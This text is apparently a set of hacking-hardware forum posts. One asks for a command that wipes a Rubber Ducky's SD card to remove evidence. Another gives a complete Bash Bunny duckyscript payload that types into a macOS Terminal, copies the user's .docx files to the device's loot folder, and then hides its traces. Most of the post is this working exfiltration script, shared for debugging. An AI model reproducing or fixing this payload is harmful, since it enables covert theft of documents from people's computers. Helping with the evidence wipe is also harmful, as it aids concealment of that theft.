[Feature request for a command to delete the ducky disk]

21 minutes ago, Struthian said:

As far as I know, the only way to really destroy the data on a flash drive is to destroy internal configuration tables which redirect around bad sectors.   To delete all data beyond recovery but, leaving a still useful drive would take significant time.   If you really want to remove all evidence, it would be faster to simply take the ducky apart, remove the SD and destroy it.

Does not work if you no longer have access to the device. Having a useful drive after the wipe is not a requirement.

[Feature request for a command to delete the ducky disk]

I would like either a duckyscript command to securely delete the contents of the sd card, or an option to delete after first execution.

[OSX exfil script]

Ahhh, ok. Thank you for the clarification. That makes sense. I was trying to do it all in one file. Thank you for the help!

[OSX exfil script]

Hello,

I am working on a script to copy document files from an OSX user's documents directory, and there seems to be an issue with text encoding of my copy command.

The script is suppose to open a terminal, copy 20 seconds worth of docx files from the users ./Documents directory to /Volumes/BashBunny/loot directory, then close the terminal, unmount the drive, then make the led green. I created the loot dir on the root of the bunny ahead of time. The line that is having trouble is here"

QUACK STRING find ./Documents -iname "*.docx" -exec cp "{}" /Volumes/BashBunny/loot \;

Here is the terminal output from when the bunny runs this line:

find ./Documents -iname *.docx -exec cp {} /Volumes/BashBunny/loot ;

find: -exec: no terminating ";" or "+"

The bunny seems to be stripping quotes and backslashes. I have tried to use similar bash commands with other special characters, but I also seem to have the same issue with pipes. I rewrote everything just having the bunny call a bash script. I had no issues using that approach, but I want to get it working in duckyscript and not rely on additional scripts.

I also noticed when trying to access directories using ~/, the bunny changed my text to /root, although the username on the target system that was executing the payload was not root. Reading through the duckyscript and bashbunny wikis do not seem to mention any of this substitution, unless I am colpeltely missing it...

Thanks!

LED R

ATTACKMODE HID STORAGE

source bunny_helpers.sh

LED B

QUACK DELAY 1000

QUACK COMMAND SPACE

QUACK DELAY 800

QUACK STRING Terminal

QUACK DELAY 500

QUACK ENTER

QUACK DELAY 500

QUACK ENTER

QUACK DELAY 500

QUACK STRING find ./Documents -iname "*.docx" -exec cp "{}" /Volumes/BashBunny/loot \;

QUACK ENTER

QUACK DELAY 10000

QUACK DELAY 10000

QUACK COMMAND q

QUACK DELAY 500

QUACK ENTER

QUACK COMMAND SPACE

QUACK DELAY 800

QUACK STRING Terminal

QUACK DELAY 800

QUACK ENTER

QUACK STRING diskutil unmount /Volumes/BashBunny

QUACK DELAY 500

QUACK ENTER

QUACK DELAY 500

QUACK COMMAND q

QUACK DELAY 500

QUACK ENTER

LED G